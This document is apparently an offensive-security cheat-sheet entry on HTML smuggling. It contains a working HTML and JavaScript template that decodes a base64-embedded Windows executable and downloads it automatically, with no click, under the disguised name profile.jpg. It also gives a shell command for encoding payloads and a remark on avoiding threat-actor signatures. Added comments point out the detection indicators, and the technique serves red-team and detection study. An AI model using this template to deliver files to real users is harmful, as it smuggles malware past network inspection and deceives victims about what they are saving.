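HTML smuggling (titled "HTTP smuggling" in the original; the technique below builds a file inside the browser from data embedded in an HTML page and is unrelated to HTTP request smuggling)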
An HTML page that makes the browser save a file as soon as the page is opened; the file is assembled client-side from data embedded in the page itself:
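* The embedded file is base64-encoded only. Base64 is an encoding, not encryption, so anyone inspecting the page source can recover the embedded bytes.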
* sometimes more encryption is not the best as it matches signatures from known threat actors.
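* The browser saves the file as profile.jpg. In this example the embedded data begins with "TVqQ", the base64 form of the "MZ" Windows executable header, so the .jpg name does not match the content.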
| <html>
<body>
<script>
/**
 * Decode a base64 string into its raw bytes.
 *
 * @param {string} base64 - Base64 text, decoded with window.atob.
 * @returns {ArrayBuffer} Buffer holding one byte per decoded character.
 */
function base64ToArrayBuffer(base64) {
  // atob yields a "binary string": each character's code unit is one byte value.
  const decoded = window.atob(base64);
  const byteView = Uint8Array.from(decoded, (ch) => ch.charCodeAt(0));
  return byteView.buffer;
}
// Top-level script: turns the embedded base64 string into a Blob and hands it
// to the browser as a download through a hidden <a download> element. The file
// bytes come from this page's own source, not from a separate response for the
// file, so inspection has to look at the HTML/JS content or at the file once
// it is written to disk.
//
// NOTE(review): file, data, blob and fileName are assigned without var/let/const,
// so in a non-strict script they become properties of the global object.

// Truncated in the page ("..."). The visible prefix "TVqQAAMAA" is base64 for
// the bytes 4D 5A 90 00 03 00, i.e. the "MZ" start of a Windows PE image; a
// long base64 literal with this prefix inside a script is a common
// content-inspection indicator.
file ="TVqQAAMAA..."
data = base64ToArrayBuffer(file);
blob = new Blob([data], {type: 'octet/stream'});
// The saved name carries a .jpg extension while the data above starts with an
// executable header; an extension/content mismatch on the written file is
// something endpoint checks can flag.
fileName = 'profile.jpg';
// Hidden anchor used only as a vehicle for the download attribute.
var a = document.createElement('a');
document.body.appendChild(a);
a.style = 'display: none';
// blob: URL that refers to the in-memory Blob created above.
var url = window.URL.createObjectURL(blob);
a.href = url;
a.download = fileName;
// Programmatic click: the download starts from script, with no user click on
// the page.
a.click();
// The blob: URL is released right after the click.
window.URL.revokeObjectURL(url);
</script>
</body>
</html>
|
Create the base64 payloads:
- `-w 0` disables line wrapping (GNU coreutils `base64`), so the output is one continuous line.
| base64 -w 0 <payload-to-download> | xclip -sel clipboard
|